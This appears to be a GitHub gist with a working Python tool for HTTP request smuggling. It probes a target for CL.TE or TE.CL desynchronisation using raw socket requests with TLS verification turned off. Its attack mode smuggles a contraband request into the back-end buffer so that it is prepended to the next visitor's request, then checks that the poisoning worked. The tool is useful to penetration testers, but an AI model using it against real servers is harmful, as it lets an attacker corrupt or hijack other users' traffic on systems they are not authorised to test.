Skip to content

Instantly share code, notes, and snippets.

@sudoaza
Last active August 14, 2019 20:15
Show Gist options
  • Save sudoaza/afedf0483e208df8d57b01598012dfff to your computer and use it in GitHub Desktop.
Save sudoaza/afedf0483e208df8d57b01598012dfff to your computer and use it in GitHub Desktop.
#!/usr/bin/env python3
import socket
import sys
import ssl
import argparse
from pwn import enhex
import time
def error(msg):
if not args.debug:
return
print(msg, sys.stderr)
def clte_detect(host, port=80, chunked_header="Transfer-Encoding: chunked"):
print("\nRunning CLTE Detection\n======================\n")
message = build_request(host, chunked_header, mode="izq")
response = request(host, port, message)
rejected = ("400 Bad Request" in response or "SMG_TIMEOUT" in response)
return not rejected
def tecl_detect(host, port=80, chunked_header="Transfer-Encoding: chunked"):
print("\nRunning TECL Detection\n======================\n\n")
message = build_request(host, chunked_header, mode="oxo")
response = request(host, port, message)
timed_out = ("SMG_TIMEOUT" in response)
return timed_out
def build_request(host, chunked_header, main_body="", smuggled_body="", mode="izq"):
content_len = 0
chunk_len = 0
if mode == "clte":
if len(main_body) > 0:
chunk_len = hex(len(main_body)).replace('0x','')
main_body = f"{chunk_len}\r\n{main_body}"
main_body += "\r\n0\r\n\r\n"
content_len = len(main_body + smuggled_body) -2
elif mode == "tecl":
chunk_len = hex(len(smuggled_body)).replace('0x','')
if len(smuggled_body) > 0:
smuggled_body = smuggled_body + "\r\n0\r\n\r\n"
content_len = len(chunk_len) + 2
main_body = chunk_len + "\r\n"
elif mode == "izq":
content_len = 4
main_body = "1\r\nZ\r\nQ\r\n"
elif mode == "oxo":
content_len = 6
main_body = "0\r\n\r\nX\r\n"
message = f"{args.http_method} {args.file} HTTP/1.1\r\n" + f"Host: {host}\r\nAccept: */*\r\n"
if len(chunked_header) > 0:
message += f"{chunked_header}\r\n"
message += f"Content-Length: {content_len}\r\n"
message += "\r\n"
message += main_body + smuggled_body
return message
def request(host, port, message):
print("# REQUEST >\n" + message + "\n")
start = time.time()
# Create a TCP/IP socket
sock = socket.socket(socket.AF_INET)
# Connect the socket to the port where the server is listening
server_address = (host, port)
if port == 443:
context = ssl.create_default_context()
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
context.verify_mode = ssl.CERT_NONE
context.check_hostname = False
conn = context.wrap_socket(sock, server_hostname=host)
sock = conn
sock.connect(server_address)
sock.settimeout(3.0)
response = b""
try:
error(f'sending "%s"' % message)
sock.sendall(str.encode(message))
while True:
data = sock.recv(1024)
response += data
if len(data) == 0 or b"0\r\n\r\n" in response:
break
error('received "%s"' % data)
response = response.decode("utf-8")
if len(response) > 4000 and args.full:
print("< RESPONSE #\n" + f"length: {len(response)}\n" + response[:4000] + "\n\n...\n\n" + response[-1000:]+ "\n")
else:
print("< RESPONSE #\n" + f"length: {len(response)}\n" + response + "\n")
return response
except socket.timeout: # fail after 1 second of no activity
response = response.decode("utf-8")
response = "SMG_TIMEOUT\r\n" + response
print("< RESPONSE #\n" + response + "\n")
return response
finally:
error('closing socket')
sock.close()
def recon(chunked_header):
if clte_detect(target_host, target_port, chunked_header):
print("CLTE Detected")
elif tecl_detect(target_host, target_port, chunked_header):
print("TECL Detected")
else:
print("Not Vulnerable")
def attack(chunked_header, contraband, mode):
print("\nAttacking\n======================\n\n")
host, port = target_host, target_port
main_body = body
smuggled_body = contraband
message = build_request(host, chunked_header, main_body, smuggled_body, mode)
response = request(host, port, message)
parser = argparse.ArgumentParser()
parser.add_argument('-d','--domain', help='Domain', required=True)
parser.add_argument('-p','--port', help='Port', required=False, default=80)
parser.add_argument('-D','--debug', help='Debug', required=False, default=False)
parser.add_argument('--full', help='Show full answer', required=False, action="store_false")
parser.add_argument('-r','--recon', help='Check if server is vulnerable', required=False, action='store_true', default=True)
parser.add_argument('-a','--attack', help='Poison buffer', required=False, action='store_true')
parser.add_argument('-e','--transfer-encoding', help='Transfer Encoding header', required=False, default="Transfer-Encoding: chunked")
parser.add_argument('-c','--contraband', help='Payload to prepend to next request', required=False, default="GET /404 HTTP/1.1\r\nFoo: b")
parser.add_argument('-m','--mode', help='clte or tecl. Content Length in front Treansfer Encoding in back (clte).', required=False, default="clte")
parser.add_argument('-b','--body', help='Request body', required=False, default="=x&q=smuggling&x=")
parser.add_argument('-x','--http-method', help='Request method', required=False, default="POST")
parser.add_argument('-f','--file', help='Request path', required=False, default="/")
args = parser.parse_args()
target_host = args.domain
target_port = int(args.port)
chunked_header = args.transfer_encoding.replace("\\n","\n").replace("\\r","\r").replace("\\t","\t")
contraband = args.contraband.replace("\\r\\n","\r\n")
mode = args.mode
body = args.body
if args.attack:
attack(chunked_header, contraband, mode)
# Check attack worked, we should get the poisoned response
attack("", "", mode)
elif args.recon:
recon(chunked_header)
else:
print("Set either the -r/--recon or -a/--attack flag.")
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment